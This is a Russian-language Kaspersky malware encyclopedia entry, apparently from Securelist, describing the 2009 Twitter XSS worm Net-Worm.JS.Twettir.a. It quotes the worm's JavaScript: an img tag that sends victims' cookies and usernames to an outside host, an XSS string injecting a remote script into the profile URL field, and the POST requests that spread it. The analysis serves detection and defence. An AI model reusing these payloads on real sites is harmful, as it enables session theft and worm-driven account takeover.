Select language:

Вход
securelist.com Уровень опасности: 1
Аналитика
Веблог
Энциклопедия
Описания
Глоссарий

Net-Worm.JS.Twettir.a

Главная / Описания / Net-Worm.JS.Twettir.a

Печать		 Bookmark and Share
Закладки
Время детектирования 13 апр 2009 23:19 MSK
Время выпуска обновления 14 апр 2009 04:06 MSK
Описание опубликовано 21 апр 2009 18:28 MSK

Технические детали

Семейство XSS-червей, распространявшихся в социальной сети Twitter в апреле 2009 года. Для своего размножения использовали XSS-уязвимости и были созданы 17-и летним американцем Michael "Mikeyy" Mooney.

Червь использовал уязвимости в программном обеспечении Twitter, позволявшие производить атаки типа «межсайтовый скриптинг» (XSS) и модифицировать страницы учётных записей пользователей. Заражение происходило при посещении модифицированной страницы на сайте Twitter, или при переходе по гиперссылке в поддельном сообщении, присланном от имени участника Twitter. При этом исполнялся вредоносный сценарий JavaScript.

Основной функционал червей содержится в трех функциях:

  • XHConn – использует стандартную функцию XMLHttpRequest() для ajax-вызовов;
  • Urlencode – использует стандартную функцию encodeURIComponent() для кодировки URI;
  • Wait – содержит вредоносный функционал.

Net-Worm.JS.Twettir.a использует XSS-уязвимость в обработке тега img:

document.write("<img src='http://mikeyylolz.uuuq.com/x.php?c=" + cookie + "&username=" + username + "'>");
document.write("<img src='http://stalkdaily.com/log.gif'/>");

В скрипт x.php передаются параметры cookies и username текущего пользователя.

После того, как атакуемый пользователь посетил вредоносную ссылку, червь начинает отправлять с его аккаунта в Twitter-е следующие сообщения (так же содержащие вредоносную ссылку):

Dude, www.StalkDaily.com is awesome. What's the fuss?"
Join www.StalkDaily.com everyone!"
Woooo, www.StalkDaily.com :)"
Virus!? What? www.StalkDaily.com is legit!"
Wow...www.StalkDaily.com"
"@twitter www. StalkDaily.com"

Также из данных сообщений произвольным образом выбирается одно, которое будет отображаться в профиле у зараженного пользователя.

Часть кода червя, в которой происходит изменение параметров пользователя посредством POST-запросов:

var xss = urlencode('http://www.stalkdaily.com"> <script src="http://mikeyylolz.uuuq.com/x.js"></script><a ');

var ajaxConn = new XHConn();
ajaxConn.connect("/status/update", "POST",
"authenticity_token="+authtoken+"&status="+updateEncode+"&tab=home&update=update");
var ajaxConn1 = new XHConn();
ajaxConn1.connect("/account/settings", "POST",
"authenticity_token="+authtoken+"&user[url]="+ xss+"&tab=home&update=update");

В последнем POST-запросе с помощью изменения параметра user[url] на страницу пользователя включается ссылка на зловредный скрипт.
Таким образом, все пользователи, посетившие зараженную страницу другого пользователя с уже добавленным скриптом, инициируют выполнение червя у себя. Это, в свою очередь, приводит к рассылке нового сообщения от их имени и добавлению зловредного скрипта к их странице.


Вредоносные программы
Вирусы и черви
Net-Worm

Вредоносная программа, обладающая способностью к несанкционированному пользователем саморазмножению в компьютерных сетях.

Отличительной особенностью данного типа червей является отсутствие необходимости в пользователе как в звене в цепочке распространения (т.е., непосредственно для активации вредоносной программы).

Зачастую при распространении такой червь ищет в сети компьютеры, на которых используется программное обеспечение, содержащее критические уязвимости. Для заражения уязвимых компьютеров червь посылает специально сформированный сетевой пакет (эксплойт), в результате чего код (или часть кода) червя проникает на компьютер-жертву и активируется. Если сетевой пакет содержит только часть кода червя, то после проникновения в уязвимый компьютер он скачивает основной файл червя и запускает его на исполнение.

Можно встретить сетевых червей данного типа, использующих сразу несколько эксплойтов для своего распространения, что увеличивает скорость нахождения ими компьютера-жертвы.

Другие модификации

Net-Worm.JS.Twettir.b

Net-Worm.JS.Twettir.c

Net-Worm.JS.Twettir.d

Net-Worm.JS.Twettir.e

Net-Worm.JS.Twettir.f

Net-Worm.JS.Twettir.g

Net-Worm.JS.Twettir.h

Другие названия

Net-Worm.JS.Twettir.a («Лаборатория Касперского») также известен как:

  • Trojan.JS.Agent.yo («Лаборатория Касперского»),
  • JS/Twitter-A (Sophos)
  • JS.Stalkdaily (ClamAV)
  • W32/Twitter.A.worm (Panda)
  • JS/Twettir.A (FPROT)
  • Worm:JS/Twitime.A (MS(OneCare))
  • JS.Twitter.1 (DrWeb)
  • Trojan.JS.Twettir.A (BitDef7)
  • JS:Twettir-A [Expl] (AVAST)
  • Net-Worm.JS.Twettir (Ikarus)
  • Generic_c.AJTK (AVG)
  • JS/Twettir.a (AVIRA)
  • Worm:JS/Twettir.C [Orion] (FSecure)
  • JS_TWETTIR.A (TrendMicro)
 

securelist.com : аналитика, веблог, энциклопедия, описания, глоссарий, RSS, рассылки, контакты
kaspersky.ru : продукты, магазин, угрозы, сервис, загрузить, партнёры, о компании

© ЗАО «Лаборатория Касперского», 1997-2010
Ведущий производитель систем защиты от вирусов, спама и хакерских атак
Зарегистрированные товарные знаки и знаки обслуживания являются собственностью их правообладателей